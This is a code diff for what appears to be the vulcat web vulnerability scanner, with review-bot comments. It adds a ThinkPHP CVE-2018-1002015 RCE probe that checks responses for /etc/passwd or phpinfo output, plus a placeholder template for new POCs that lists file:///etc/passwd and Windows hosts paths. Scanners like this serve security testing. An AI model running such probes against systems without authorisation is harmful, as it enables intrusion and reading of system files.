+ vul_info['vul_method'] = 'POST'
+
+ for payload in self.cve_2018_1002015_payloads:
+ path = payload['path']
+ data = payload['data']
+ headers = payload['headers']
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['data'] = data
+ vul_info['headers'] = headers
+ vul_info['target'] = target
+
+ try:
+ res = requests.post(
+ target,
+ timeout=self.timeout,
+ headers=headers,
+ data=data,
+ proxies=self.proxies,
+ verify=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ if (('root:x:0:0:root' in res.text)
+ or (('PHP Version' in res.text)
+ and ('PHP License' in res.text))
+ ):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Method': vul_info['vul_method'],
+ 'Payload': {
+ 'Url': url,
+ 'Path': path,
+ 'Data': data
+ }
+ }
+ return results
+
def addscan(self, url):
return [
thread(target=self.cnvd_2018_24942_scan, url=url),
thread(target=self.cnnvd_201901_445_scan, url=url),
thread(target=self.thinkphp_2_x_rce_scan, url=url),
- thread(target=self.thinkphp_5_ids_sqlinject_scan, url=url)
+ thread(target=self.thinkphp_5_ids_sqlinject_scan, url=url),
+ thread(target=self.cve_2018_1002015_scan, url=url)
]
thinkphp = ThinkPHP()
\ No newline at end of file
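Review bot: The `requests.post` call in `cve_2018_1002015_scan` omits `allow_redirects=False`, which every other probe added in this commit passes (ElasticSearch.py, AtlassianConfluence.py and the demo2.py template), so a redirecting front end makes this scan follow the 3xx and log the wrong response; add `allow_redirects=False` after `verify=False`. The success test `'root:x:0:0:root' in res.text` is tied to the first payload's `cat /etc/passwd` and only matches Unix-like targets, whereas the class's existing RCE check in `cnvd_2018_24942_scan` (earlier hunk) compares against `self.md` through `check.check_res`; reusing that marker-based command and check here would make the result platform-neutral and keep the tool's footprint on the target to an echo. As in the other new scans, the bare `except:` should be `except Exception:` so an interrupt is not logged as `'Error'`.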
diff --git a/payloads/demo2.py b/payloads/demo2.py
new file mode 100644
index 0000000..cd55e3c
--- /dev/null
+++ b/payloads/demo2.py
@@ -0,0 +1,134 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+ XXXXX扫描类:
+ XXXXX 未开启强制路由RCE
+ CNVD-2018-24942
+file:///etc/passwd
+file:///C:\Windows\System32\drivers\etc\hosts
+file:///C:/Windows/System32/drivers/etc/hosts
+'''
+
+from lib.api.dns import dns
+from lib.initial.config import config
+from lib.tool.md5 import md5, random_md5
+from lib.tool.logger import logger
+from lib.tool.thread import thread
+from lib.tool import check
+from lib.tool import head
+from thirdparty import requests
+from time import sleep
+
+class 1(): # ! 1: 类名(例如 ThinkPHP)
+ ''' 标有数字的地方都需要自己填写 '''
+ def __init__(self):
+ self.timeout = config.get('timeout')
+ self.headers = config.get('headers').copy()
+ self.proxies = config.get('proxies')
+
+ self.app_name = '2' # ! 2: 漏洞框架/应用程序/CMS等(例如 thinkphp)
+ self.md = md5(self.app_name)
+ self.cmd = 'echo ' + self.md
+
+ self.3_payloads = [ # ! 3: Payload的名称(例如 cnvd_2018_24942_payloads)
+ {
+ 'path': '4', # ! 4: url路径(例如/admin/login)
+ 'data': '5', # ! 5: POST数据, 没有的话可以不写
+ 'headers': head.merge(self.headers, {}) # ! 6: Headers请求头, 填在{}里面, 字典形式; 没有的话可以不写, 不写的话将使用默认请求头; 如果存在同名的请求头, 则会覆盖掉原来的
+ },
+ ]
+
+ def 7_scan(self, url): # ! 7: POC的名称(例如 cnvd_2018_24942_scan)
+ ''' '''
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = '8' # ! 8: 漏洞类型(例如 RCE)
+ vul_info['vul_id'] = '9' # ! 9: 漏洞编号(例如 CNVD-2018-24942)
+ vul_info['vul_method'] = '10' # ! 10: 请求方式(例如 GET)
+
+ for payload in range(len(self.3_payloads)): # ! 3: 同上, Payload的名称
+ path = self.3_payloads[payload]['path'] # ! 3: 同上, Payload的名称
+ data = self.3_payloads[payload]['data'] # ! 3: 同上, Payload的名称
+ headers = self.3_payloads[payload]['headers'] # ! 3: 同上, Payload的名称
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['data'] = data
+ vul_info['headers'] = headers
+ vul_info['target'] = target
+
+ try:
+ if payload == 0: # * 当payload为第1个时, 执行xxx操作
+ res = requests.11( # ! 11: 请求方式(例如 get)
+ target,
+ timeout=self.timeout,
+ headers=headers,
+ data=data,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ elif payload == 1: # * 当payload为第2个时, 执行xxx操作
+ res = requests.11( # ! 11: 请求方式(例如 get)
+ target,
+ timeout=self.timeout,
+ headers=headers,
+ data=data,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ '''!!!
+ 可以自定义results中的信息, 格式:
+ 标题: 值(str/list/dict)
+ str类型: key: value的格式进行显示
+ list类型: 会以key: value value value ...的格式进行显示
+ dict类型: 会以↓的格式进行显示
+ dict:
+ key1: value1
+ key2: value2
+ ...
+ '''
+ if ('12'): # ! 12: 判断扫描结果
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Method': vul_info['vul_method'],
+ 'Payload': {
+ 'Url': url,
+ 'Path': path,
+ 'Data': data,
+ 'Cookie': 'xxx',
+ 'Headers': headers
+ }
+ }
+ return results
+
+ def addscan(self, url):
+ return [
+ thread(target=self.6_scan, url=url) # ! 6: 同上, POC的名称
+ ]
+
+13 = 1() # ! 1: 同上, 类名
+
+'''
+ # ! 13: 对象名称
+ # ! 需要在vulcat/lib/initial/config.py加入对象名称, 找到以下代码并继续添加
+ app_list = ['alidruid', 'airflow', 'apisix', 'cisco', 'django', 'fastjson']
+ # ! 然后在vulcat/lib/core/coreScan.py引入POC, 引入方式为
+ from payloads.文件名 import 对象名称
+ # ! 引入完成后, 自定义POC就成功了, 可以运行vulcat试试效果
+'''
\ No newline at end of file
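Review bot: The template's `addscan` returns `thread(target=self.6_scan, url=url)` annotated `# ! 6: 同上, POC的名称`, but the POC method placeholder defined above is `7_scan` (`# ! 7: POC的名称`) and `6` is the headers placeholder, so anyone filling in the numbers literally ends up calling a method that does not exist; the line should read `thread(target=self.7_scan, url=url) # ! 7: 同上, POC的名称`. Because placeholders such as `class 1():`, `self.3_payloads` and `requests.11(` are not valid Python, this file raises `SyntaxError` on import, and keeping it under `payloads/` with a `.py` extension is only safe while nothing imports or globs that package; a `.py.template` name or a sentence in the header saying the file must not be imported would remove that risk. `if ('12'):` is always true as written and would report every target as vulnerable if the placeholder is left in place; a placeholder that fails loudly, e.g. `if (False): # ! 12: 判断扫描结果`, is safer for a template. `self.headers = config.get('headers').copy()` also differs from the `config.get('headers')` used by the other scanner classes in this commit; whichever is intended should be used consistently.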